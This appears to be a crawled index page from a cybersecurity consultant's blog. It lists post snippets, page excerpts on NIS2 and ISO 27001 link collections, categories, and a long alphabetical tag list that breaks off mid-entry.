http://farmanager.com/files/FarManager170.exe - [Windows Genuine Advantage](https://www.sorinmustaca.com/windows-genuine-advantage/) - There's been a long time since I posted here. I didn't have the time to do this anymore. But, when I've seen this proof of stupidity, I couldn't resist... This is what my Windows wants to update .. " Windows Genuine Advantage Validation Tool (KB892130) 710 KB , less than 1 minute The Windows Genuine - [Moving the blog around](https://www.sorinmustaca.com/moving-the-blog-around/) - In the last days I've been moving this blog from and to blogger to make some tests. In the end, it can be accessed via my website as well. http://www.mustaca.de/blog ## Pages - [Work with me](https://www.sorinmustaca.com/work-with-me/) - I have been working in IT security since 2000 — first building antimalware products used by over 100 million people at Avira, then founding Endpoint Cybersecurity GmbH to help companies build better security products and pass the audits that matter. The blog you're reading is how I think in public. This page is about what - [NIS2 Collection](https://www.sorinmustaca.com/nis2-collection/) - https://www.sorinmustaca.com/nis2-fulfillment-through-tisax-assessment-and-isa6/ https://www.sorinmustaca.com/nis-2-10-common-misconceptions-about-the-regulation/ https://www.sorinmustaca.com/nis2-perform-a-risk-assessment/ https://www.sorinmustaca.com/nis2-3-establish-a-cybersecurity-framework/ https://www.sorinmustaca.com/nis2-2-designate-a-responsible-person-or-team/ https://www.sorinmustaca.com/how-to-nis2-eu-directive/ https://www.sorinmustaca.com/executive-summary-nis2-directive-for-the-eu-members/ Helpful posts: https://www.sorinmustaca.com/how-to-implement-an-information-security-management-system-isms/ https://www.sorinmustaca.com/demystifying-cybersecurity-terms-policy-standard-procedure-controls-framework/ - [Contact](https://www.sorinmustaca.com/contact/) - If you want to know more about me, please check the About page. By submitting your name and email address you automatically agree with our Privacy Policy. Please DO NOT contact me for: publishing articles on this website adding additional links to my articles reviewing some products referring to your products/website/article/whatever If you want - [ISO 27001:2022 Collection](https://www.sorinmustaca.com/iso-27001-2022-collection/) - https://www.sorinmustaca.com/implementing-iso-27001-2022-annex-a-18-compliance/ https://www.sorinmustaca.com/implementing-iso-27001-2022-annex-a-17-information-security-aspects-of-business-continuity-management/ https://www.sorinmustaca.com/implementing-iso-27001-2022-annex-a-16-information-security-incident-management/ https://www.sorinmustaca.com/implementing-iso-270012022-annex-a-15-supplier-relationships/ https://www.sorinmustaca.com/understanding-iso-270012022-annex-a-14-system-acquisition-development-and-maintenance/ https://www.sorinmustaca.com/understanding-iso-27001-2022-annex-a-13-communications-security/ https://www.sorinmustaca.com/understanding-iso-270012022-annex-a-12-operations-security/ https://www.sorinmustaca.com/understanding-iso-27001-2022-annex-a-11-physical-and-environmental-security/ https://www.sorinmustaca.com/understanding-iso-27001-2022-annex-a-10-cryptography/ https://www.sorinmustaca.com/understanding-iso-27001-2022-annex-a-9-access-control/ https://www.sorinmustaca.com/understanding-iso-27001-2022-annex-a-8-asset-management/ https://www.sorinmustaca.com/understanding-iso-27001-2022-annex-a-7-human-resource-security/ https://www.sorinmustaca.com/understanding-iso-27001-2022-annex-a-6/ https://www.sorinmustaca.com/iso-27001-2022-annex-a-5/ https://www.sorinmustaca.com/annex-a-of-iso-27001-2022-explained/ https://www.sorinmustaca.com/iso-270012022-chapter-by-chapter-description/ https://www.sorinmustaca.com/the-iso-27000-family-of-protocols-and-their-role-in-cybersecurity/ - [Cybersecurity and AI Collection](https://www.sorinmustaca.com/cybersecurity-and-ai-collection/) - https://www.sorinmustaca.com/balancing-functionality-and-privacy-concerns-in-ai-based-endpoint-security-solutions/ https://www.sorinmustaca.com/artificial-intelligence-vs-machine-learning/ https://www.sorinmustaca.com/thoughts-on-ai-and-cybersecurity/ https://www.sorinmustaca.com/chatgpt-and-copywriting/ https://www.sorinmustaca.com/chatgpt-and-automotive-cybersecurity-2-2-tisax-certification/ https://www.sorinmustaca.com/chatgpt-and-automotive-cybersecurity-1-2-about-csms-from-iso-21434/ https://www.sorinmustaca.com/so-much-hype-about-chat-gpt-here-are-some-facts/ - [About](https://www.sorinmustaca.com/about/) - Sorin Mustaca, (ISC)2 CSSLP, CompTIA Security+ and Project+, is working since 2000 in the IT Security industry and between 2003 and 2014 for Avira. In his role as Product Manager he was responsible for the known Avira AntiVir products used by over 100 million users world-wide. Serving the security needs of so many different users - [Privacy Policy](https://www.sorinmustaca.com/privacy-policy/) - We hate spam as much as you do. If you subscribe to the free newsletter or the RSS Feed we will not spam you or sell your email address to anyone else. You can always unsubscribe by clicking the unsubscribe button at the bottom of the article. This website doesn’t allow registration, so it doesn’t - [In the news](https://www.sorinmustaca.com/in-the-news/) - If you want my opinion on various topics on IT Security you can contact me via social media or via the form in the the Contact page. Here are the websites where I have been quoted: ​ USA Today Washington Times Computer Weekly Security Week el Confidential Security Insider Blog.Isc2.org Dark Reading Technews World Network - [Download the free eBook](https://www.sorinmustaca.com/book/) - [Tipps und Ratschläge - IT Sicherheit](https://www.sorinmustaca.com/tipps-und-ratschlage-it-sicherheit/) - Quelle: http://cybersecuritymonth.eu/press-campaign-toolbox/ecsm-material/tips-and-advices/tips-and-advices/security-tips-advice-de.pdf Tipps und Ratschläge Nutzen Sie diese Tipps und Ratschläge und machen Sie sich den sicheren Umgang mit dem Internet zur Gewohnheit. Dieser Abschnitt wurde in Abstimmung mit der Initiative „Get Safe Online“ (Sicher online gehen) aus dem Vereinigten Königreich und dem Department of Homeland Security, der Heimatschutzbehörde der USA, entwickelt.  Schützen - [Securitate in limba Romana](https://www.sorinmustaca.com/securitate-in-limba-romana/) - Sfaturi şi recomandări Sursa: http://cybersecuritymonth.eu/press-campaign-toolbox/ecsm-material/tips-and-advices/tips-and-advices/security-tips-advice-ro.pdf Prezentele sfaturi şi recomandări vă ajută să vă faceţi un obicei din navigarea online în condiţii de securitate. Această secţiune a fost elaborată în coordonare cu serviciul guvernamental de securitate "Get Safe Online" din Regatul Unit şi Departamentul de Securitate Naţională (Department of Homeland Security) din Statele Unite ale Americii.  Protejaţi-vă ## Categories - [Uncategorized](https://www.sorinmustaca.com/category/uncategorized/) - [(isc)2](https://www.sorinmustaca.com/category/isc2-2/) - [agile](https://www.sorinmustaca.com/category/agile/) - [Antivirus](https://www.sorinmustaca.com/category/cybersecurity/antivirus/) - [CSSLP](https://www.sorinmustaca.com/category/isc2-2/csslp-2/) - [distributed systems](https://www.sorinmustaca.com/category/distributed-systems/) - [General](https://www.sorinmustaca.com/category/general/) - [News](https://www.sorinmustaca.com/category/news/) - [Photography](https://www.sorinmustaca.com/category/photography/) - [question](https://www.sorinmustaca.com/category/question/) - [quoted](https://www.sorinmustaca.com/category/quoted/) - [Security](https://www.sorinmustaca.com/category/security/) - [Spam & Phishing](https://www.sorinmustaca.com/category/spam-phishing/) - [improve-your-security](https://www.sorinmustaca.com/category/improve-your-security/) - [published-external](https://www.sorinmustaca.com/category/published-external/) - [security breach](https://www.sorinmustaca.com/category/security-breach/) - [privacy](https://www.sorinmustaca.com/category/privacy/) - [Educational](https://www.sorinmustaca.com/category/educational/) - [Automotive](https://www.sorinmustaca.com/category/cybersecurity/automotive/) - [IoT](https://www.sorinmustaca.com/category/iot/) - [Phishing](https://www.sorinmustaca.com/category/phishing/) - [ChatGPT](https://www.sorinmustaca.com/category/ai-ml/chatgpt/) - [ECS](https://www.sorinmustaca.com/category/ecs/) - [NIS2](https://www.sorinmustaca.com/category/cybersecurity/nis2/) - [Article](https://www.sorinmustaca.com/category/article/) - [AI & ML](https://www.sorinmustaca.com/category/ai-ml/) - [Cybersecurity](https://www.sorinmustaca.com/category/cybersecurity/) - [TISAX](https://www.sorinmustaca.com/category/cybersecurity/tisax/) - [ISMS](https://www.sorinmustaca.com/category/cybersecurity/isms/) - [ISO 27001](https://www.sorinmustaca.com/category/cybersecurity/iso-27001/) - [SSDLC](https://www.sorinmustaca.com/category/ssdlc/) - [SOC2](https://www.sorinmustaca.com/category/cybersecurity/soc2/) - [DORA](https://www.sorinmustaca.com/category/cybersecurity/dora/) - [Agile Delivery](https://www.sorinmustaca.com/category/agile-delivery/) - [GRC](https://www.sorinmustaca.com/category/grc/) - [CRA](https://www.sorinmustaca.com/category/cybersecurity/cra/) - [Certification](https://www.sorinmustaca.com/category/certification/) - All types of cybersecurity certifications: NIS2, ISO 27001, TISAX,DORA, CRA, CSMS ## Tags - [(ISC)2 Blog](https://www.sorinmustaca.com/tag/isc2-blog/) - [0 seconds](https://www.sorinmustaca.com/tag/0-seconds/) - [12 principles](https://www.sorinmustaca.com/tag/12-principles/) - [1und1](https://www.sorinmustaca.com/tag/1und1/) - [1_billionth_spam_message_stats](https://www.sorinmustaca.com/tag/1_billionth_spam_message_stats/) - [32 bit](https://www.sorinmustaca.com/tag/32-bit/) - [32 bits](https://www.sorinmustaca.com/tag/32-bits/) - [32-bit and 64-bit Application Interoperability](https://www.sorinmustaca.com/tag/32-bit-and-64-bit-application-interoperability/) - [3D](https://www.sorinmustaca.com/tag/3d/) - [47PFL8404H/12](https://www.sorinmustaca.com/tag/47pfl8404h12/) - [503](https://www.sorinmustaca.com/tag/503/) - [6.1](https://www.sorinmustaca.com/tag/6-1/) - [64 bit](https://www.sorinmustaca.com/tag/64-bit/) - [64 bits](https://www.sorinmustaca.com/tag/64-bits/) - [7170](https://www.sorinmustaca.com/tag/7170/) - [7240](https://www.sorinmustaca.com/tag/7240/) - [7270](https://www.sorinmustaca.com/tag/7270/) - [ad.ag bacn.me bit.ly budurl.com cli.gs cli.gs doiop.com dwarfURL.com fb.me goo.gl ht.ly idek.net is.gd k.im kno.li lnks.it memurl.com moourl.com notlong.com pigf.lu qls.me r2me.com ReadthisURL Shorl.c](https://www.sorinmustaca.com/tag/ad-ag-bacn-me-bit-ly-budurl-com-cli-gs-cli-gs-doiop-com-dwarfurl-com-fb-me-goo-gl-ht-ly-idek-net-is-gd-k-im-kno-li-lnks-it-memurl-com-moourl-com-notlong-com-pigf-lu-qls-me-r2me-com-readthisurl-shorl-c/) - [adapt](https://www.sorinmustaca.com/tag/adapt/) - [adobe](https://www.sorinmustaca.com/tag/adobe/) - [adobe reader](https://www.sorinmustaca.com/tag/adobe-reader/) - [adobe sandbox](https://www.sorinmustaca.com/tag/adobe-sandbox/) - [advices](https://www.sorinmustaca.com/tag/advices/) - [AFAIK](https://www.sorinmustaca.com/tag/afaik/) - [agile alliance](https://www.sorinmustaca.com/tag/agile-alliance/) - [airpi](https://www.sorinmustaca.com/tag/airpi/) - [Alan Turing](https://www.sorinmustaca.com/tag/alan-turing/) - [alert](https://www.sorinmustaca.com/tag/alert/) - [alert level](https://www.sorinmustaca.com/tag/alert-level/) - [alliance](https://www.sorinmustaca.com/tag/alliance/) - [AM](https://www.sorinmustaca.com/tag/am/) - [amazon](https://www.sorinmustaca.com/tag/amazon/) - [Amazon Books](https://www.sorinmustaca.com/tag/amazon-books/) - [Amazon Cloud Drive](https://www.sorinmustaca.com/tag/amazon-cloud-drive/) - [amss](https://www.sorinmustaca.com/tag/amss/) - [amtso](https://www.sorinmustaca.com/tag/amtso/) - [android](https://www.sorinmustaca.com/tag/android/) - [Anti Botnet Initiative](https://www.sorinmustaca.com/tag/anti-botnet-initiative/) - [anti-botnet](https://www.sorinmustaca.com/tag/anti-botnet/) - [Antiphishing Toolbar](https://www.sorinmustaca.com/tag/antiphishing-toolbar/) - [antispam](https://www.sorinmustaca.com/tag/antispam/) - [Antispam Summit](https://www.sorinmustaca.com/tag/antispam-summit/) - [antivirus for p2p](https://www.sorinmustaca.com/tag/antivirus-for-p2p/) - [antivirus testing](https://www.sorinmustaca.com/tag/antivirus-testing/) - [apache portable runtime](https://www.sorinmustaca.com/tag/apache-portable-runtime/) - [App Store](https://www.sorinmustaca.com/tag/app-store/) - [apple](https://www.sorinmustaca.com/tag/apple/) - [apple security myths](https://www.sorinmustaca.com/tag/apple-security-myths/) - [Application Store](https://www.sorinmustaca.com/tag/application-store/) - [apr](https://www.sorinmustaca.com/tag/apr/) - [apr memory pool](https://www.sorinmustaca.com/tag/apr-memory-pool/) - [apt-get](https://www.sorinmustaca.com/tag/apt-get/) - [aquires](https://www.sorinmustaca.com/tag/aquires/) - [Arrested](https://www.sorinmustaca.com/tag/arrested/) - [article](https://www.sorinmustaca.com/tag/article/) - [article virus bulletin virusbtn phishing website protec](https://www.sorinmustaca.com/tag/article-virus-bulletin-virusbtn-phishing-website-protec/) - [attached](https://www.sorinmustaca.com/tag/attached/) - [attack](https://www.sorinmustaca.com/tag/attack/) - [Audi A4](https://www.sorinmustaca.com/tag/audi-a4/) - [authentication](https://www.sorinmustaca.com/tag/authentication/) - [authenticator](https://www.sorinmustaca.com/tag/authenticator/) - [AUTO](https://www.sorinmustaca.com/tag/auto/) - [av](https://www.sorinmustaca.com/tag/av/) - [avast](https://www.sorinmustaca.com/tag/avast/) - [avg](https://www.sorinmustaca.com/tag/avg/) - [Avira](https://www.sorinmustaca.com/tag/avira/) - [Avira Mustaca](https://www.sorinmustaca.com/tag/avira-mustaca/) - [Avira Premium](https://www.sorinmustaca.com/tag/avira-premium/) - [Avira Risk Level](https://www.sorinmustaca.com/tag/avira-risk-level/) - [Avira Romania](https://www.sorinmustaca.com/tag/avira-romania/) - [avira te](https://www.sorinmustaca.com/tag/avira-te/) - [avira techblog](https://www.sorinmustaca.com/tag/avira-techblog/) - [Avira Techblog Anti-Botnet Initiative bsi eco](https://www.sorinmustaca.com/tag/avira-techblog-anti-botnet-initiative-bsi-eco/) - [Avira Technical Editor](https://www.sorinmustaca.com/tag/avira-technical-editor/) - [avira. phishing](https://www.sorinmustaca.com/tag/avira-phishing/) - [AVM](https://www.sorinmustaca.com/tag/avm/) - [backup](https://www.sorinmustaca.com/tag/backup/) - [backup other folders](https://www.sorinmustaca.com/tag/backup-other-folders/) - [bad formated](https://www.sorinmustaca.com/tag/bad-formated/) - [bad language](https://www.sorinmustaca.com/tag/bad-language/) - [bad words](https://www.sorinmustaca.com/tag/bad-words/) - [Bank News](https://www.sorinmustaca.com/tag/bank-news/) - [barcelona](https://www.sorinmustaca.com/tag/barcelona/) - [BCR](https://www.sorinmustaca.com/tag/bcr/) - [Bereichen Technologie](https://www.sorinmustaca.com/tag/bereichen-technologie/) - [Billion Spammers Served](https://www.sorinmustaca.com/tag/billion-spammers-served/) - [bit.ly](https://www.sorinmustaca.com/tag/bit-ly/) - [Black Friday](https://www.sorinmustaca.com/tag/black-friday/) - [blacksheep](https://www.sorinmustaca.com/tag/blacksheep/) - [books](https://www.sorinmustaca.com/tag/books/) - [bot](https://www.sorinmustaca.com/tag/bot/) - [botfrei](https://www.sorinmustaca.com/tag/botfrei/) - [botfrei.de](https://www.sorinmustaca.com/tag/botfrei-de/) - [botnet](https://www.sorinmustaca.com/tag/botnet/) - [Boulevard Magazine](https://www.sorinmustaca.com/tag/boulevard-magazine/) - [box](https://www.sorinmustaca.com/tag/box/) - [browse](https://www.sorinmustaca.com/tag/browse/) - [browser](https://www.sorinmustaca.com/tag/browser/) - [browser choice](https://www.sorinmustaca.com/tag/browser-choice/) - [browsing](https://www.sorinmustaca.com/tag/browsing/) - [brute force](https://www.sorinmustaca.com/tag/brute-force/) - [bsi](https://www.sorinmustaca.com/tag/bsi/) - [Buffer Copy](https://www.sorinmustaca.com/tag/buffer-copy/) - [bugs](https://www.sorinmustaca.com/tag/bugs/) - [Built-in Projector](https://www.sorinmustaca.com/tag/built-in-projector/) - [bulgaria](https://www.sorinmustaca.com/tag/bulgaria/) - [bundle](https://www.sorinmustaca.com/tag/bundle/) - [businesswire.com](https://www.sorinmustaca.com/tag/businesswire-com/) - [buys](https://www.sorinmustaca.com/tag/buys/) - [byron acohido](https://www.sorinmustaca.com/tag/byron-acohido/) - [c++](https://www.sorinmustaca.com/tag/c/) - [C++ MSBuild](https://www.sorinmustaca.com/tag/c-msbuild/) - [c++11](https://www.sorinmustaca.com/tag/c11/) - [CA](https://www.sorinmustaca.com/tag/ca/) - [canadian pharmacy](https://www.sorinmustaca.com/tag/canadian-pharmacy/) - [Cancel Transaction](https://www.sorinmustaca.com/tag/cancel-transaction/) - [casino](https://www.sorinmustaca.com/tag/casino/) - [cdn](https://www.sorinmustaca.com/tag/cdn/) - [CentMail](https://www.sorinmustaca.com/tag/centmail/) - [CEO](https://www.sorinmustaca.com/tag/ceo/) - [certificate](https://www.sorinmustaca.com/tag/certificate/) - [certificate authority](https://www.sorinmustaca.com/tag/certificate-authority/) - [certification](https://www.sorinmustaca.com/tag/certification/) - [Certified Secure Software Lifecycle Professional](https://www.sorinmustaca.com/tag/certified-secure-software-lifecycle-professional/) - [Charney](https://www.sorinmustaca.com/tag/charney/) - [checksum](https://www.sorinmustaca.com/tag/checksum/) - [children](https://www.sorinmustaca.com/tag/children/) - [chrome](https://www.sorinmustaca.com/tag/chrome/) - [cialis](https://www.sorinmustaca.com/tag/cialis/) - [cleanport](https://www.sorinmustaca.com/tag/cleanport/) - [clothes](https://www.sorinmustaca.com/tag/clothes/) - [cloud](https://www.sorinmustaca.com/tag/cloud/) - [cloud services](https://www.sorinmustaca.com/tag/cloud-services/) - [clouddrive](https://www.sorinmustaca.com/tag/clouddrive/) - [cnet](https://www.sorinmustaca.com/tag/cnet/) - [Code](https://www.sorinmustaca.com/tag/code/) - [Colorful Spam](https://www.sorinmustaca.com/tag/colorful-spam/) - [com](https://www.sorinmustaca.com/tag/com/) - [Command Line](https://www.sorinmustaca.com/tag/command-line/) - [commercials](https://www.sorinmustaca.com/tag/commercials/) - [complex](https://www.sorinmustaca.com/tag/complex/) - [comptia](https://www.sorinmustaca.com/tag/comptia/) - [comptia project+](https://www.sorinmustaca.com/tag/comptia-project/) - [comptia security+](https://www.sorinmustaca.com/tag/comptia-security/) - [comptia security+ 2008](https://www.sorinmustaca.com/tag/comptia-security-2008/) - [Computer Security Privacy](https://www.sorinmustaca.com/tag/computer-security-privacy/) - [computing](https://www.sorinmustaca.com/tag/computing/) - [con](https://www.sorinmustaca.com/tag/con/) - [concepts](https://www.sorinmustaca.com/tag/concepts/) - [concert](https://www.sorinmustaca.com/tag/concert/) - [Conclusion Manowar](https://www.sorinmustaca.com/tag/conclusion-manowar/) - [conference](https://www.sorinmustaca.com/tag/conference/) - [confiker](https://www.sorinmustaca.com/tag/confiker/) - [connection](https://www.sorinmustaca.com/tag/connection/) - [convert](https://www.sorinmustaca.com/tag/convert/) - [cores](https://www.sorinmustaca.com/tag/cores/) - [course](https://www.sorinmustaca.com/tag/course/) - [CPU](https://www.sorinmustaca.com/tag/cpu/) - [create secure passwords](https://www.sorinmustaca.com/tag/create-secure-passwords/) - [createprocess](https://www.sorinmustaca.com/tag/createprocess/) - [credit card hack kartenhaus.de kartenhaus hacked stolen](https://www.sorinmustaca.com/tag/credit-card-hack-kartenhaus-de-kartenhaus-hacked-stolen/) - [criptography](https://www.sorinmustaca.com/tag/criptography/) - [csslp](https://www.sorinmustaca.com/tag/csslp/) - [cyber security](https://www.sorinmustaca.com/tag/cyber-security/) - [cybercriminals](https://www.sorinmustaca.com/tag/cybercriminals/) - [cyberterrorism](https://www.sorinmustaca.com/tag/cyberterrorism/) - [cygwin](https://www.sorinmustaca.com/tag/cygwin/) - [daemon](https://www.sorinmustaca.com/tag/daemon/) - [Daily Telegraph](https://www.sorinmustaca.com/tag/daily-telegraph/) - [darkreading](https://www.sorinmustaca.com/tag/darkreading/) - [DB](https://www.sorinmustaca.com/tag/db/) - [ddj](https://www.sorinmustaca.com/tag/ddj/) - [DE](https://www.sorinmustaca.com/tag/de/) - [de-cleaner](https://www.sorinmustaca.com/tag/de-cleaner/) - [deadlock](https://www.sorinmustaca.com/tag/deadlock/) - [defender](https://www.sorinmustaca.com/tag/defender/) - [Defenses](https://www.sorinmustaca.com/tag/defenses/) - [development](https://www.sorinmustaca.com/tag/development/) - [Die Chase Bank](https://www.sorinmustaca.com/tag/die-chase-bank/) - [Digital Camera](https://www.sorinmustaca.com/tag/digital-camera/) - [Dirk Knopp](https://www.sorinmustaca.com/tag/dirk-knopp/) - [distributed network](https://www.sorinmustaca.com/tag/distributed-network/) - [DNS](https://www.sorinmustaca.com/tag/dns/) - [dnschanger](https://www.sorinmustaca.com/tag/dnschanger/) - [Document](https://www.sorinmustaca.com/tag/document/) - [dos](https://www.sorinmustaca.com/tag/dos/) - [dr dobbs](https://www.sorinmustaca.com/tag/dr-dobbs/) - [Draft Technical Report](https://www.sorinmustaca.com/tag/draft-technical-report/) - [Drive-by](https://www.sorinmustaca.com/tag/drive-by/) - [dropbox](https://www.sorinmustaca.com/tag/dropbox/) - [dropper](https://www.sorinmustaca.com/tag/dropper/) - [Dual Core Duo](https://www.sorinmustaca.com/tag/dual-core-duo/) - [duplicati](https://www.sorinmustaca.com/tag/duplicati/) - [DVD](https://www.sorinmustaca.com/tag/dvd/) - [Eastern Europe](https://www.sorinmustaca.com/tag/eastern-europe/) - [Eastern European](https://www.sorinmustaca.com/tag/eastern-european/) - [easybits media](https://www.sorinmustaca.com/tag/easybits-media/) - [Ebay](https://www.sorinmustaca.com/tag/ebay/) - [ebooks](https://www.sorinmustaca.com/tag/ebooks/) - [eco](https://www.sorinmustaca.com/tag/eco/) - [ED](https://www.sorinmustaca.com/tag/ed/) - [eicar](https://www.sorinmustaca.com/tag/eicar/) - [email](https://www.sorinmustaca.com/tag/email/) - [emerging trends](https://www.sorinmustaca.com/tag/emerging-trends/) - [emule](https://www.sorinmustaca.com/tag/emule/) - [encourages](https://www.sorinmustaca.com/tag/encourages/) - [Endorsement Process](https://www.sorinmustaca.com/tag/endorsement-process/) - [enisa](https://www.sorinmustaca.com/tag/enisa/) - [environment](https://www.sorinmustaca.com/tag/environment/) - [Eric Adams](https://www.sorinmustaca.com/tag/eric-adams/) - [error](https://www.sorinmustaca.com/tag/error/) - [Errors](https://www.sorinmustaca.com/tag/errors/) - [esecurityplanet.com](https://www.sorinmustaca.com/tag/esecurityplanet-com/) - [ESET](https://www.sorinmustaca.com/tag/eset/) - [eu](https://www.sorinmustaca.com/tag/eu/) - [europa](https://www.sorinmustaca.com/tag/europa/) - [europe](https://www.sorinmustaca.com/tag/europe/) - [European Union](https://www.sorinmustaca.com/tag/european-union/) - [exam](https://www.sorinmustaca.com/tag/exam/) - [exchange](https://www.sorinmustaca.com/tag/exchange/) - [Extension Gallery](https://www.sorinmustaca.com/tag/extension-gallery/) - [Facebook](https://www.sorinmustaca.com/tag/facebook/) - [Facebook Anwendungen](https://www.sorinmustaca.com/tag/facebook-anwendungen/) - [fake CA](https://www.sorinmustaca.com/tag/fake-ca/) - [fake signature](https://www.sorinmustaca.com/tag/fake-signature/) - [Fast User](https://www.sorinmustaca.com/tag/fast-user/) - [father](https://www.sorinmustaca.com/tag/father/) - [FBI](https://www.sorinmustaca.com/tag/fbi/) - [Features](https://www.sorinmustaca.com/tag/features/) - [fedora](https://www.sorinmustaca.com/tag/fedora/) - [firefox](https://www.sorinmustaca.com/tag/firefox/) - [firefox 3](https://www.sorinmustaca.com/tag/firefox-3/) - [firefox 3.5](https://www.sorinmustaca.com/tag/firefox-3-5/) - [firesheep](https://www.sorinmustaca.com/tag/firesheep/) - [firewall](https://www.sorinmustaca.com/tag/firewall/) - [flash](https://www.sorinmustaca.com/tag/flash/) - [flash updates](https://www.sorinmustaca.com/tag/flash-updates/) - [flaw](https://www.sorinmustaca.com/tag/flaw/) - [flickr photos](https://www.sorinmustaca.com/tag/flickr-photos/) - [Frankfurt Stock Exchange](https://www.sorinmustaca.com/tag/frankfurt-stock-exchange/) - [Fraudsters](https://www.sorinmustaca.com/tag/fraudsters/) - [free](https://www.sorinmustaca.com/tag/free/) - [free antivirus](https://www.sorinmustaca.com/tag/free-antivirus/) - [Free Antivirus Products](https://www.sorinmustaca.com/tag/free-antivirus-products/) - [free av](https://www.sorinmustaca.com/tag/free-av/) - [free online storage](https://www.sorinmustaca.com/tag/free-online-storage/) - [free vpn](https://www.sorinmustaca.com/tag/free-vpn/) - [free wifi](https://www.sorinmustaca.com/tag/free-wifi/) - [free-av.com](https://www.sorinmustaca.com/tag/free-av-com/) - [freemium](https://www.sorinmustaca.com/tag/freemium/) - [fritz](https://www.sorinmustaca.com/tag/fritz/) - [fritz box](https://www.sorinmustaca.com/tag/fritz-box/) - [Fujitsu Siemens](https://www.sorinmustaca.com/tag/fujitsu-siemens/) - [Full Test Result](https://www.sorinmustaca.com/tag/full-test-result/) - [futex google is sorry antivirus](https://www.sorinmustaca.com/tag/futex-google-is-sorry-antivirus/) - [Future Simple](https://www.sorinmustaca.com/tag/future-simple/) - [g+](https://www.sorinmustaca.com/tag/g/) - [games](https://www.sorinmustaca.com/tag/games/) - [GB](https://www.sorinmustaca.com/tag/gb/) - [Genetic Programming](https://www.sorinmustaca.com/tag/genetic-programming/) - [geneva](https://www.sorinmustaca.com/tag/geneva/) - [German Facebook](https://www.sorinmustaca.com/tag/german-facebook/) - [Germany](https://www.sorinmustaca.com/tag/germany/) - [GFI](https://www.sorinmustaca.com/tag/gfi/) - [Global Risk Level](https://www.sorinmustaca.com/tag/global-risk-level/) - [Good Day](https://www.sorinmustaca.com/tag/good-day/) - [google](https://www.sorinmustaca.com/tag/google/) - [Google Adsense](https://www.sorinmustaca.com/tag/google-adsense/) - [Google Antispam](https://www.sorinmustaca.com/tag/google-antispam/) - [Google Chrome](https://www.sorinmustaca.com/tag/google-chrome/) - [Google launches open-source Chrome web browser](https://www.sorinmustaca.com/tag/google-launches-open-source-chrome-web-browser/) - [Google Maps](https://www.sorinmustaca.com/tag/google-maps/) - [google maps plane](https://www.sorinmustaca.com/tag/google-maps-plane/) - [google plus](https://www.sorinmustaca.com/tag/google-plus/) - [google spreadsheet spam](https://www.sorinmustaca.com/tag/google-spreadsheet-spam/) - [google wave](https://www.sorinmustaca.com/tag/google-wave/) - [GP](https://www.sorinmustaca.com/tag/gp/) - [gpg](https://www.sorinmustaca.com/tag/gpg/) - [gpg4win](https://www.sorinmustaca.com/tag/gpg4win/) - [gratis](https://www.sorinmustaca.com/tag/gratis/) - [groups](https://www.sorinmustaca.com/tag/groups/) - [hacked](https://www.sorinmustaca.com/tag/hacked/) - [hackers](https://www.sorinmustaca.com/tag/hackers/) - [handles](https://www.sorinmustaca.com/tag/handles/) - [Hardware](https://www.sorinmustaca.com/tag/hardware/) - [hd](https://www.sorinmustaca.com/tag/hd/) - [hdd](https://www.sorinmustaca.com/tag/hdd/) - [hdmi](https://www.sorinmustaca.com/tag/hdmi/) - [hints](https://www.sorinmustaca.com/tag/hints/) - [hips](https://www.sorinmustaca.com/tag/hips/) - [holidays](https://www.sorinmustaca.com/tag/holidays/) - [hong kong](https://www.sorinmustaca.com/tag/hong-kong/) - [hootsuite](https://www.sorinmustaca.com/tag/hootsuite/) - [htc](https://www.sorinmustaca.com/tag/htc/) - [htc touch hd](https://www.sorinmustaca.com/tag/htc-touch-hd/) - [HTML](https://www.sorinmustaca.com/tag/html/) - [htpc](https://www.sorinmustaca.com/tag/htpc/) - [http](https://www.sorinmustaca.com/tag/http/) - [http://twitter.com/sorinmustaca](https://www.sorinmustaca.com/tag/httptwitter-comsorinmustaca/) - [ia32](https://www.sorinmustaca.com/tag/ia32/) - [IE](https://www.sorinmustaca.com/tag/ie/) - [IEEE](https://www.sorinmustaca.com/tag/ieee/) - [IFTTT](https://www.sorinmustaca.com/tag/ifttt/) - [Ihr Kreditkartenunternehmen Ihnen](https://www.sorinmustaca.com/tag/ihr-kreditkartenunternehmen-ihnen/) - [ilustrations](https://www.sorinmustaca.com/tag/ilustrations/) - [impozit](https://www.sorinmustaca.com/tag/impozit/) - [Impozite Dupa](https://www.sorinmustaca.com/tag/impozite-dupa/) - [improve](https://www.sorinmustaca.com/tag/improve/) - [improve your security](https://www.sorinmustaca.com/tag/improve-your-security/) - [in the cloud](https://www.sorinmustaca.com/tag/in-the-cloud/) - [infected](https://www.sorinmustaca.com/tag/infected/) - [infection](https://www.sorinmustaca.com/tag/infection/) - [infinite loop](https://www.sorinmustaca.com/tag/infinite-loop/) - [infosecurity US](https://www.sorinmustaca.com/tag/infosecurity-us/) - [INPUT](https://www.sorinmustaca.com/tag/input/) - [install](https://www.sorinmustaca.com/tag/install/) - [Intel](https://www.sorinmustaca.com/tag/intel/) - [Intel Corporation](https://www.sorinmustaca.com/tag/intel-corporation/) - [Internal Server Error](https://www.sorinmustaca.com/tag/internal-server-error/) - [internet](https://www.sorinmustaca.com/tag/internet/) - [internet explorer](https://www.sorinmustaca.com/tag/internet-explorer/) - [Internet Service Providers](https://www.sorinmustaca.com/tag/internet-service-providers/) - [internet@tv](https://www.sorinmustaca.com/tag/internettv/) - [interrupt](https://www.sorinmustaca.com/tag/interrupt/) - [interview](https://www.sorinmustaca.com/tag/interview/) - [IP](https://www.sorinmustaca.com/tag/ip/) - [ipc shared memory shm](https://www.sorinmustaca.com/tag/ipc-shared-memory-shm/) - [iphone](https://www.sorinmustaca.com/tag/iphone/) - [IPO](https://www.sorinmustaca.com/tag/ipo/) - [isc](https://www.sorinmustaca.com/tag/isc/) - [isc2](https://www.sorinmustaca.com/tag/isc2/) - [iso](https://www.sorinmustaca.com/tag/iso/) - [ISP](https://www.sorinmustaca.com/tag/isp/) - [ISSE](https://www.sorinmustaca.com/tag/isse/) - [IT](https://www.sorinmustaca.com/tag/it/) - [IT Business Edge](https://www.sorinmustaca.com/tag/it-business-edge/) - [jailbreak](https://www.sorinmustaca.com/tag/jailbreak/) - [January Short](https://www.sorinmustaca.com/tag/january-short/) - [java](https://www.sorinmustaca.com/tag/java/) - [jgc](https://www.sorinmustaca.com/tag/jgc/) - [job](https://www.sorinmustaca.com/tag/job/) - [john graham cumming](https://www.sorinmustaca.com/tag/john-graham-cumming/) - [Joseph Phillips](https://www.sorinmustaca.com/tag/joseph-phillips/) - [JPG](https://www.sorinmustaca.com/tag/jpg/) - [karmik](https://www.sorinmustaca.com/tag/karmik/) - [Kartenhaus 